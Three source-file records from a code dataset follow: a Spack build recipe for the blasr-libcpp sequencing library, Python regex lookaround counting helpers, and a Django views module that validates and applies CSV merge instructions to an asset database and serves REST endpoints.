+{"seq_id":"258180859","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nimport os\n\nfrom spack.package import *\n\n\nclass BlasrLibcpp(Package):\n \"\"\"Blasr_libcpp is a library used by blasr\n and other executables such as samtoh5,\n loadPulses for analyzing PacBio sequences.\"\"\"\n\n homepage = \"https://github.com/PacificBiosciences/blasr_libcpp\"\n url = \"https://github.com/PacificBiosciences/blasr_libcpp/archive/5.3.1.tar.gz\"\n\n maintainers = [\"robqiao\"]\n\n version(\"5.3.1\", sha256=\"45a673255bfe7e29ed1f5bdb6410aa45cb6b907400d038c3da9daf1058b09156\")\n\n depends_on(\"pbbam\")\n depends_on(\"hdf5+cxx@1.8.12:1.8\")\n # maximum version is 1.8.20 currently. There doesn't appear to be a\n # major version 1.9 and the 1.10.1 version doesn't build correctly.\n # https://github.com/PacificBiosciences/blasr/issues/355\n\n depends_on(\"python@2.7:2.8\", type=\"build\")\n\n @run_before(\"install\")\n def configure(self, spec, prefix):\n configure_args = [\n \"PBBAM_INC={0}\".format(self.spec[\"pbbam\"].prefix.include),\n \"PBBAM_LIB={0}\".format(self.spec[\"pbbam\"].prefix.lib),\n \"HDF5_INC={0}\".format(self.spec[\"hdf5\"].prefix.include),\n \"HDF5_LIB={0}\".format(self.spec[\"hdf5\"].prefix.lib),\n ]\n python(\"configure.py\", *configure_args)\n\n @run_before(\"install\")\n def build(self, spec, prefix):\n os.environ[\"CPLUS_INCLUDE_PATH\"] = self.stage.source_path\n make()\n\n def install(self, spec, prefix):\n install_tree(\"alignment\", prefix.alignment)\n install_tree(\"hdf\", prefix.hdf)\n install_tree(\"pbdata\", prefix.pbdata)\n\n def setup_dependent_build_environment(self, env, dependent_spec):\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec.prefix.hdf)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec.prefix.alignment)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec.prefix.pbdata)\n\n def setup_run_environment(self, env):\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec[\"blasr-libcpp\"].prefix.pbdata)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec[\"blasr-libcpp\"].prefix.alignment)\n env.prepend_path(\"LD_LIBRARY_PATH\", self.spec[\"blasr-libcpp\"].prefix.hdf)\n","sub_path":"var/spack/repos/builtin/packages/blasr-libcpp/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"653762943","text":"import re\n\n\ndef count_n_repetitions(text, n=1):\n \"\"\"\n Counts how often characters are followed by themselves for\n n times.\n\n text: UTF-8 compliant input text\n n: How often character should be repeated, defaults to 1\n \"\"\"\n count = 0\n for i, char in enumerate(text, start=0):\n if re.match(rf\"{re.escape(char)}(?={re.escape(char)}{{{n}}})\", text[i:]):\n count += 1\n return count\n\n\ndef count_n_reps_or_n_chars_following(text, n=1, char=\"\"):\n \"\"\"\n Counts how often characters are repeated for n times, or\n followed by char n times.\n\n text: UTF-8 compliant input text\n n: How often character should be repeated, defaults to 1\n char: Character which also counts if repeated n times\n \"\"\"\n if char == \"\":\n return count_n_repetitions(text, n)\n\n count = 0\n for i, c in enumerate(text, start=0):\n pattern_c = re.compile(rf\"{re.escape(c)}(?={re.escape(c)}{{{n}}})\")\n pattern_char = re.compile(rf\"{re.escape(c)}(?={re.escape(char)}{{{n}}})\")\n if re.match(pattern_c, text[i:]):\n count += 1\n continue\n if re.match(pattern_char, text[i:]):\n count += 1\n return count\n\n\ndef check_surrounding_chars(text, surrounding_chars):\n \"\"\"\n Count the number of times a character is surrounded by\n characters from the surrounding_chars list.\n\n text: UTF-8 compliant input text\n surrounding_chars: List of characters\n \"\"\"\n escaped_surround_chars = re.escape(\"\".join(surrounding_chars))\n surround_pattern = \"[\" + escaped_surround_chars + \"]\"\n\n hits = re.findall(\n rf\"\"\"\n (?<= # start look-behind group\n {surround_pattern}\n ) # end look-behind group\n (.) # match all characters\n (?= # start look-ahead group\n {surround_pattern}\n ) # end look-ahead group\n \"\"\",\n text,\n flags=re.DOTALL | re.VERBOSE,\n )\n\n return len(hits)\n\n\ndef main() -> int:\n pass\n\n\nif __name__ == \"__main__\":\n print(check_surrounding_chars(\"ABCCBAAAZz\", [\"Z\", \"A\"]))\n exit(main())\n","sub_path":"280/regex_lookahead_lookbehind.py","file_name":"regex_lookahead_lookbehind.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"286283867","text":"from rest_framework import viewsets, filters\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.pagination import LimitOffsetPagination\n\nfrom rest_framework.settings import api_settings\nfrom rest_framework_csv.renderers import CSVRenderer\n\nfrom assets.models import RawAsset, Asset, AssetType, Category, Tag, TargetPopulation, ProvidedService, Location, Organization\nfrom assets.serializers import AssetSerializer, AssetGeoJsonSerializer, AssetListSerializer, AssetTypeSerializer, \\\n CategorySerializer, FullLocationSerializer\n\nfrom assets.management.commands.util import parse_cell, standardize_phone\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom assets.forms import UploadFileForm\nfrom assets.utils import distance\n\nimport os, pytz\nfrom datetime import datetime, timedelta\nfrom assets.tasks import sync_assets_to_carto_eventually\n\ndef there_is_a_field_to_update(row, fields_to_check):\n \"\"\"Scan record for certain fields and see if any exist\n and are non-null (meaning that a Location could be\n created.\"\"\"\n update_is_needed = False\n for field in fields_to_check:\n if field in row and row[field] not in ['', None]:\n return True\n return update_is_needed\n\ndef boolify(x): # This differs from the assets.management.commands.util versiion of boolify.\n if x.lower() in ['true', 't']:\n return True\n if x.lower() in ['false', 'f']:\n return False\n return None\n\ndef eliminate_empty_strings(xs):\n return [x for x in xs if x != '']\n\ndef non_blank_type_or_none(row, field, desired_type): # This could be imported from elsewhere.\n \"\"\"This function tries to cast the value of row[field] to\n the passed desired type (e.g, float or int). If it fails,\n or if the passed value is an empty string (which is how\n None values are passed by CSVs), it returns None.\n\n Note that this does not yet support fields like\n PhoneNumberField, URLField, and EmailField.\"\"\"\n if field in row:\n if row[field] == '':\n return None\n if desired_type == bool:\n return boolify(row[field])\n try:\n return desired_type(row[field])\n except ValueError:\n if desired_type == int:\n try:\n return int(float(row[field])) # This is necessary to handle\n # cases where Excel obliviously appends \".0\" to integers.\n except ValueError:\n return None\n return None\n return None\n\ndef pipe_delimit(xs):\n return '|'.join([str(x) for x in xs])\n\ndef list_of(named_things):\n # This converts ManyToManyField values back to a list.\n return [t.name for t in named_things.all()]\n\ndef check_or_update_value(instance, row, mode, more_results, source_field_name, field_type=str):\n if source_field_name not in row:\n return instance, more_results\n new_value = non_blank_type_or_none(row, source_field_name, field_type)\n\n old_value = getattr(instance, source_field_name)\n if new_value != old_value:\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n setattr(instance, source_field_name, new_value)\n return instance, more_results\n\n\ndef modify_destination_asset(mode, row, destination_asset, created_new_asset, more_results):\n error = False\n if 'location_id' in row:\n location_id = row['location_id']\n if location_id in ['', None, 'new']:\n # Create a new Location instance to be populated.\n location = None # Location creation happens below.\n else:\n location = Location.objects.get(pk=location_id)\n else: # If the location_id field is omitted from the merge instructions,\n # fall back to the destination asset's location (which may be None).\n location = destination_asset.location\n\n # I'm choosing to not update the Location.name field here since we may want to manually name Location instances,\n # particularly to deal with cases like the two restaurant locations in Schenley Plaza that have the same\n # street address and parcel ID but slightly different geocoordinates.\n if location is None:\n if there_is_a_field_to_update(row, ['street_address', 'municipality', 'city', 'state', 'zip_code', 'parcel_id', 'latitude', 'longitude']):\n if mode == 'update':\n more_results.append(f\"Creating a new Location for this Asset.\")\n else:\n more_results.append(f\"A new Location would be created for this Asset.\")\n location = Location()\n elif there_is_a_field_to_update(row, ['residence', 'iffy_geocoding', 'unit', 'unit_type', 'available_transportation', 'geocoding_properties']):\n more_results.append(\"There is not enough information to create a new location for this Asset, but there are fields in the merge-instructions file which need to be assigned to a Location. Does not compute! ABORTING!!!
\")\n return None, more_results, True\n\n if 'organization_id' in row:\n organization_id = row['organization_id']\n if organization_id in ['', None, 'new']:\n # Create a new Organization instance to be populated.\n organization = None # Organization creation happens below.\n else:\n organization = Organization.objects.get(pk=organization_id)\n else: # If the organization_id field is omitted from the merge instructions,\n # fall back to the destination asset's organization (which may be None).\n organization = destination_asset.organization\n\n\n asset_name = row['name']\n if asset_name != destination_asset.name:\n more_results.append(f\"asset_name {'will be ' if mode == 'validate' else ''}changed from {destination_asset.name} to {asset_name}.\")\n destination_asset.name = asset_name\n\n # [ ] Oddball legacy conversion to be deleted:\n source_field_name = 'accessibility_features'\n if source_field_name in row:\n new_value = boolify(row[source_field_name])\n old_value = destination_asset.accessibility\n if new_value != old_value:\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n destination_asset.accessibility = new_value\n\n\n missing_organization_identifier = True\n if 'organization_name' in row and row['organization_name'] not in ['', None]:\n missing_organization_identifier = False\n elif 'organization_id' in row and row['organization_id'] not in ['', None]:\n missing_organization_identifier = False\n # Which is about the same as what I originally wrote:\n # missing_organization_identifier = (('organization_name' not in row) or (row['organization_name'] == '')) and (('organization_id' not in row) or (row['organization_id'] == ''))\n # but whatever.\n\n if missing_organization_identifier:\n # The organization can be identified EITHER by the organization_id value or by the organization_name value.\n if ('organization_phone' in row and row['organization_phone'] != '') or ('organization_email' in row and row['organization_email'] != ''):\n more_results.append(f\"The organization's name or ID value is required if you want to change either the phone or e-mail address (as a check that the correct Organization instance is being updated. ABORTING!!!!\\n
.\")\n return None, more_results, True\n #else: This is being removed for now since it seems like it could accidentally delete extant organizations.\n # destination_asset.organization = None # Set ForiegnKey to None.\n # more_results.append(f\" Since the organization has not been clearly identified by name or ID, the Asset's organization is being set to None and other fields (organization_phone and organization email) are being ignored.\")\n else:\n if organization is None:\n if mode == 'update':\n more_results.append(f\"Creating a new Organization for this Asset.\")\n else:\n more_results.append(f\"A new Organization would be created for this Asset.\")\n organization = Organization() # Create new organization instance.\n\n source_field_name = 'organization_name'\n destination_field_name = 'name'\n new_value = non_blank_type_or_none(row, source_field_name, str)\n old_value = organization.name\n if new_value != old_value:\n more_results.append(f\"organization.{destination_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n organization.name = new_value\n\n # check_or_update_value() can not be used without adding separate handling of source_field_name and destination_field_name.\n source_field_name = 'organization_email'\n if source_field_name in row:\n destination_field_name = 'email'\n new_value = non_blank_type_or_none(row, source_field_name, str)\n old_value = organization.email\n if new_value != old_value:\n more_results.append(f\"organization.{destination_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n organization.email = new_value\n\n source_field_name = 'organization_phone'\n if source_field_name in row:\n new_value = standardize_phone(non_blank_type_or_none(row, source_field_name, str))\n old_value = organization.phone\n if new_value != old_value:\n more_results.append(f\"organization.{destination_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n organization.phone = new_value\n\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'street_address', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'unit', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'unit_type', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'municipality', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'city', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'state', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'zip_code', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'parcel_id', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'residence', field_type=bool)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'iffy_geocoding', field_type=bool)\n\n if 'latitude' in row or 'longitude' in row:\n old_latitude, old_longitude = location.latitude, location.longitude\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'latitude', field_type=float)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'longitude', field_type=float)\n if 'latitude' in row or 'longitude' in row:\n dist = distance(old_latitude, old_longitude, location.latitude, location.longitude)\n if dist is not None:\n more_results.append(f\" The distance between the old and new coordinates is {dist:.2f} feet.\")\n\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'available_transportation', field_type=str)\n location, more_results = check_or_update_value(location, row, mode, more_results, source_field_name = 'geocoding_properties', field_type=str)\n\n # BEGIN Handle parent_location and parent_location_id\n source_field_name = 'parent_location_id'\n new_value = non_blank_type_or_none(row, source_field_name, str)\n old_value = getattr(getattr(location, 'parent_location', None), 'id', None)\n\n if new_value != old_value:\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n new_parent_location = Location.objects.get(pk = new_value)\n setattr(location, 'parent_location', new_parent_location)\n\n if 'parent_location' in row:\n parent_location_name = getattr(getattr(location, 'parent_location', None), 'name', None)\n more_results.append(f\"The parent_location name (after any parent_location_id updates) {'would be' if mode == 'validate' else 'is'} {parent_location_name}. [The 'parent_location' value in the merge-instructions file is not used to make updates.]\")\n # END Handle parent_location and parent_location_id\n\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'url', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'email', field_type=str)\n source_field_name = 'phone'\n if source_field_name in row:\n new_value = standardize_phone(non_blank_type_or_none(row, source_field_name, str))\n old_value = destination_asset.phone\n if new_value != old_value:\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {old_value} to {new_value}.\")\n destination_asset.phone = new_value\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'hours_of_operation', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'holiday_hours_of_operation', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'periodicity', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'capacity', field_type=int)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'periodicity', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'wifi_network', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'wifi_notes', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'internet_access', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'computers_available', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'accessibility', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'open_to_public', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'child_friendly', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'sensitive', field_type=bool)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'localizability', field_type=str)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'etl_notes', field_type=str)\n\n # Unfortunately the many-to-many relations that follow can not be set on an Asset until it has been saved,\n # so for cases where created_new_asset == True, we have to save the Asset once at this point so it has an\n # id value.\n if created_new_asset and mode == 'update':\n destination_asset._change_reason = \"Asset Updater: Initial save of Asset to allow many-to-many relationships\"\n destination_asset.save(override_carto_sync = created_new_asset)\n destination_asset, more_results = check_or_update_value(destination_asset, row, mode, more_results, source_field_name = 'do_not_display', field_type=bool)\n # do_not_display must be set after the destination asset is initially saved since if\n # a new asset is created, it could be initially locationless and therefore have\n # do_not_display auto-set to True.\n\n source_field_name = 'asset_type'\n new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n list_of_old_values = list_of(destination_asset.asset_types) if not created_new_asset else []\n if set(new_values) != set(list_of_old_values):\n more_results.append(f\"asset_type {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n if new_values == []:\n more_results.append(f\"asset_type can not be empty\\n ABORTING!!!\\n
\")\n return None, more_results, True\n try:\n validated_asset_types = [AssetType.objects.get(name=asset_type) for asset_type in new_values] # Change get to get_or_create to allow creation of new asset types.\n # It's better to require manual creation of new asset types for now since that encourages us to specify a Category (necessary for mapping).\n if mode == 'update':\n destination_asset.asset_types.set(validated_asset_types)\n except AssetType.DoesNotExist:\n more_results.append(f\"Unable to find one of these asset types: {new_values}.\\n ABORTING!!!\\n
\")\n return None, more_results, True\n\n source_field_name = 'tags'\n if source_field_name in row:\n new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n list_of_old_values = list_of(destination_asset.tags) if not created_new_asset else []\n if set(new_values) != set(list_of_old_values):\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n if mode == 'update':\n if new_values == []:\n destination_asset.tags.clear()\n else:\n validated_values = [Tag.objects.get_or_create(name=value)[0] for value in new_values]\n destination_asset.tags.set(validated_values)\n\n source_field_name = 'services'\n if source_field_name in row:\n new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n list_of_old_values = list_of(destination_asset.services) if not created_new_asset else []\n if set(new_values) != set(list_of_old_values):\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n if mode == 'update':\n if new_values == []:\n destination_asset.services.clear()\n else:\n validated_values = [ProvidedService.objects.get_or_create(name=value)[0] for value in new_values]\n destination_asset.services.set(validated_values)\n\n source_field_name = 'hard_to_count_population'\n if source_field_name in row:\n new_values = eliminate_empty_strings(row[source_field_name].split('|'))\n list_of_old_values = list_of(destination_asset.hard_to_count_population) if not created_new_asset else []\n if set(new_values) != set(list_of_old_values):\n more_results.append(f\"{source_field_name} {'will be ' if mode == 'validate' else ''}changed from {pipe_delimit(list_of_old_values)} to {pipe_delimit(new_values)}.\")\n if mode == 'update':\n if new_values == []:\n destination_asset.hard_to_count_population.clear()\n else:\n validated_values = [TargetPopulation.objects.get_or_create(name=value)[0] for value in new_values]\n destination_asset.hard_to_count_population.set(validated_values)\n\n # Fields that don't need to be updated: primary_key_from_rocket, synthesized_key, data_source_name, data_source_url\n return destination_asset, location, organization, more_results, False\n\n\ndef handle_uploaded_file(f, mode, using):\n import csv\n more_results = []\n\n assert using in ['using-raw-assets', 'using-assets']\n\n if f.size > 25000000:\n raise ValueError(\"handle_uploaded_file hasn't implemented saving the file for reading/parsing yet.\")\n #for chunk in f.chunks(): # \"Looping over chunks() instead of using read()\n # # ensures that large files don't overwhelm your system's memory.\n # destination.write(chunk)\n else:\n decoded_file = f.read().decode('utf-8').splitlines()\n\n # Validate the file\n if using == 'using-assets':\n reader = csv.DictReader(decoded_file)\n for row in reader:\n if 'asset_id' in row and row['asset_id'] not in ['']:\n try:\n assert row['asset_id'] == ''\n except AssertionError:\n more_results.append(f\"id should be blank but is actually {row['asset_id']}. ASSET UPDATER FAILURE.\")\n return more_results\n\n if 'id' in row:\n # Verify that this matches an Asset in the database.\n raw_id = row['id']\n if raw_id not in ['']:\n try:\n primary_asset_iterator = Asset.objects.filter(id = raw_id)\n assert len(primary_asset_iterator) == 1 # To ensure it exists in the database.\n except AssertionError:\n more_results.append(f\"Failed to find Asset with id == {raw_id}. ASSET UPDATER FAILURE.\")\n return more_results\n\n if 'ids_to_merge' in row:\n # Verify that these match Assets in the database.\n ids_to_merge = row['ids_to_merge']\n if ids_to_merge not in ['']:\n try:\n asset_ids = [int(i) for i in ids_to_merge.split('+')]\n assets_iterator = Asset.objects.filter(id__in = asset_ids)\n assert len(assets_iterator) == len(asset_ids) # To ensure they all exist in the database.\n except AssertionError:\n more_results.append(f\"Failed to find Assets with ids == {asset_ids}. ASSET UPDATER FAILURE.\")\n return more_results\n\n if 'location_id' in row and row['location_id'] not in ['', None]:\n try:\n location = Location.objects.get(pk = row['location_id'])\n except Location.DoesNotExist:\n more_results.append(f\"Failed to find Location with id == {row['location_id']}. ASSET UPDATER FAILURE.\")\n return more_results\n\n if 'organization_id' in row and row['organization_id'] not in ['', None]:\n try:\n organization = Organization.objects.get(pk = row['organization_id'])\n except Location.DoesNotExist:\n more_results.append(f\"Failed to find Organization with id == {row['location_id']}. ASSET UPDATER FAILURE.\")\n return more_results\n\n asset_ids_to_sync_to_carto = []\n reader = csv.DictReader(decoded_file)\n for row in reader:\n\n created_new_asset = False\n # Process the 'id' field\n raw_id = row['id']\n if using == 'using-raw-assets':\n primary_raw_asset_iterator = RawAsset.objects.filter(id = raw_id)\n assert len(primary_raw_asset_iterator) == 1 # To ensure it exists in the database.\n primary_raw_asset = primary_raw_asset_iterator[0]\n elif using == 'using-assets':\n primary_asset_iterator = Asset.objects.filter(id = raw_id)\n assert len(primary_asset_iterator) == 1 # To ensure it exists in the database.\n destination_asset = primary_asset_iterator[0] # Note that here\n # the primary asset is also the destination asset.\n\n # Process the 'asset_id' field\n if using == 'using-raw-assets':\n asset_id = row['asset_id']\n if asset_id in ['', None]:\n created_new_asset = True\n destination_asset = Asset()\n more_results.append(f\"A new Asset {'would' if mode == 'validate' else 'will'} be created.\")\n else:\n destination_asset_iterator = Asset.objects.filter(id = asset_id)\n assert len(destination_asset_iterator) == 1 # To ensure there is exactly one in the database.\n destination_asset = destination_asset_iterator[0]\n\n # Process the 'ids_to_merge' field\n ids_to_merge = row['ids_to_merge']\n if using == 'using-raw-assets':\n if ids_to_merge == '':\n continue # Skip rows with no ids to merge.\n raw_ids = [int(i) for i in ids_to_merge.split('+')]\n raw_assets_iterator = RawAsset.objects.filter(id__in = raw_ids)\n assert len(raw_assets_iterator) == len(raw_ids) # To ensure they all exist in the database.\n raw_assets = list(raw_assets_iterator)\n for raw_asset in raw_assets:\n raw_asset.asset = destination_asset\n\n if len(raw_assets) == 1:\n if created_new_asset:\n summary = f\"{'Validating this process: ' if mode == 'validate' else ''}Creating a new Asset, \"\n else:\n summary = f\"{'Validating this process: ' if mode == 'validate' else ''}Editing the Asset with id = {asset_id}, previously named {destination_asset.name}, \"\n summary += f\"and linking it to RawAsset with id = {raw_assets[0].id} and name = {raw_assets[0].name}.\"\n else:\n summary = f\"{'Validating this process: ' if mode == 'validate' else ''}Merging RawAssets with ids = {', '.join([str(r.id) for r in raw_assets])} and names = {', '.join([r.name for r in raw_assets])} \"\n if created_new_asset:\n summary += f\" to a new Asset with name {row.get('name', '(No name given)')}.\"\n else:\n summary += f\" to Asset with id = {asset_id}, previously named {destination_asset.name}.\"\n more_results.append(summary)\n\n elif using == 'using-assets':\n # When merging Assets, the Asset that is not the destination\n # asset should be delisted.\n if mode == 'update':\n if ids_to_merge == '':\n destination_asset.do_not_display = True\n destination_asset._change_reason = f'Asset Updater: Delisting Asset'\n destination_asset.save(override_carto_sync = True)\n asset_ids_to_sync_to_carto.append(destination_asset.id)\n s = f\"Delisting {destination_asset.name}.\"\n more_results.append(s)\n continue # Skip rows with no ids to merge.\n asset_ids = [int(i) for i in ids_to_merge.split('+')]\n assert destination_asset.id in asset_ids\n\n assets_iterator = Asset.objects.filter(id__in = asset_ids)\n assert len(assets_iterator) == len(asset_ids) # To ensure they all exist in the database.\n s = f\"{'Validating this process: ' if mode == 'validate' else ''}Editing the Asset with id = {destination_asset.id}, previously named {destination_asset.name}.\"\n more_results.append(s)\n if len(assets_iterator) > 1:\n s = f\"Delisting extra Assets (from the list {ids_to_merge}) and assigning corresponding RawAssets to the destination Asset.\"\n more_results.append(s)\n\n for asset in assets_iterator:\n if destination_asset.id is not None and asset.id != destination_asset.id:\n asset.do_not_display = True # These Assets could be deleted (rather than delisted)\n # AFTER reassinging their RawAssets.\n asset._change_reason = f'Asset Updater: Delisting Asset'\n asset.save()\n asset_ids_to_sync_to_carto.append(asset.id)\n\n # Iterate over raw assets of this asset and point them to destination_asset.\n for raw_asset in asset.rawasset_set.all():\n raw_asset.asset = destination_asset\n raw_asset._change_reason = f'Asset Updater: Linking RawAsset to different Asset because of Asset merge'\n raw_asset.save() # This saving couldn't be done below\n # because there can be multiple sets of RawAssets. They'd\n # all have to be collected into raw_assets to do it below.\n else:\n if '+' in ids_to_merge:\n s = f\"Extra Assets (from the list {ids_to_merge}) would be delisted and corresponding RawAssets would be assigned to the destination Asset.\"\n more_results.append(s)\n elif ids_to_merge == '':\n s = f\"{destination_asset.name} would be delisted.\"\n more_results.append(s)\n\n ### At this point the fields that differentiate Asset-based Asset updates from\n ### RawAsset-based Asset updates have been processed.\n ### What comes out of this stage is destination_asset and raw_assets.\n destination_asset, location, organization, more_results, error = modify_destination_asset(mode, row, destination_asset, created_new_asset, more_results)\n if error:\n return more_results\n\n if mode == 'update':\n more_results.append(f\"Updating associated Asset, RawAsset, Location, and Organization instances. (This may leave some orphaned.)\\n\")\n more_results.append(f' Updated Asset\\n')\n change_reason = f'Asset Updater: {\"Creating new \" if created_new_asset else \"Updating \"}Asset'\n destination_asset._change_reason = change_reason\n destination_asset.save(override_carto_sync = True) # Is this save actually necessary, given that there's another below?\n\n if using == 'using-raw-assets':\n for raw_asset in raw_assets: # RawAssets must be saved first because an Asset needs at least one\n # linked RawAsset or else it will automatically have do_not_display set to True.\n raw_asset._change_reason = f'Asset Updater: Linking to {\"new \" if created_new_asset else \"\"}Asset'\n raw_asset.save()\n\n if organization is not None:\n organization._change_reason = change_reason\n organization.save()\n if location is not None:\n location._change_reason = change_reason\n location.save()\n more_results.append(f' Linked Location\\n
')\n destination_asset.location = location\n destination_asset.organization = organization\n destination_asset._change_reason = change_reason\n destination_asset.save(override_carto_sync = True)\n asset_ids_to_sync_to_carto.append(destination_asset.id)\n else:\n more_results.append(f\"\\n
\")\n\n if mode == 'update' and len(asset_ids_to_sync_to_carto) > 0:\n sync_assets_to_carto_eventually(asset_ids_to_sync_to_carto)\n more_results.append(f\"\\nasset_ids_to_sync_to_carto = {asset_ids_to_sync_to_carto}\")\n return more_results\n\n@staff_member_required\ndef upload_file(request, using):\n # The \"using\" parameter should have either the value \"using-raw-assets\" or\n # the value \"using-assets\".\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n if 'validate' in request.POST: # The user hit the \"Validate\" button:\n mode = \"validate\"\n else:\n mode = \"update\"\n results = handle_uploaded_file(request.FILES['file'], mode, using)\n return render(request, 'update.html', {'form': form, 'results': results, 'asset_based': using == 'using-assets'})\n else:\n form = UploadFileForm()\n return render(request, 'update.html', {'form': form, 'results': [], 'asset_based': using == 'using-assets'})\n\ndef dump_assets(filepath):\n from django.core.management import call_command\n call_command('dump_assets_all_fields', filepath)\n\n@staff_member_required\ndef request_asset_dump(request):\n filepath = '/home/david/downloads/asset_dump.csv'\n if os.path.exists(filepath): # Clear the file if it exists.\n os.remove(filepath)\n\n # This SHOULD run the process as a separate thread, allowing it to\n # complete after the page is rendered.\n # t = threading.Thread(target=dump_assets, args=[filepath], daemon=True)\n # t.start()\n # but it doesn't. Only 30 lines are written (though the web page does render).\n dump_assets(filepath) # This works but results in a broken web page.\n record_count = len(Asset.objects.all())\n minutes = record_count/32731*7 + 1\n estimated_completion_time_utc = (datetime.utcnow() + timedelta(minutes=minutes))\n eta_local = estimated_completion_time_utc.astimezone(pytz.timezone('America/New_York')).time().strftime(\"%H:%M\")\n return render(request, 'dump.html', {'url': 'https://assets.wprdc.org/asset_dump.csv', 'eta': eta_local})\n\nclass AssetViewSet(viewsets.ModelViewSet):\n renderer_classes = tuple(api_settings.DEFAULT_RENDERER_CLASSES) + (CSVRenderer, )\n queryset = Asset.objects.all()\n pagination_class = LimitOffsetPagination\n filter_backends = [filters.SearchFilter]\n search_fields = ['name',]\n\n def get_serializer_class(self, *args, **kwargs):\n fmt = self.request.GET.get('fmt', None)\n if fmt in ('geojson', 'geo'):\n return AssetGeoJsonSerializer\n if self.action == 'list':\n return AssetListSerializer\n return AssetSerializer\n\n\nclass AssetTypeViewSet(viewsets.ModelViewSet):\n renderer_classes = tuple(api_settings.DEFAULT_RENDERER_CLASSES) + (CSVRenderer, )\n queryset = AssetType.objects.all()\n serializer_class = AssetTypeSerializer\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n renderer_classes = tuple(api_settings.DEFAULT_RENDERER_CLASSES) + (CSVRenderer, )\n queryset = Category.objects.all()\n serializer_class = CategorySerializer\n\n\nclass LocationViewSet(viewsets.ModelViewSet):\n # Note that this view is designed for easy access to the full model from a Python\n # script, so it uses a full-model serializer and the Django REST Framework's\n # default snake-case JSON renderer.\n renderer_classes = (JSONRenderer, CSVRenderer)\n queryset = Location.objects.all()\n serializer_class = FullLocationSerializer\n","sub_path":"assets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":36797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
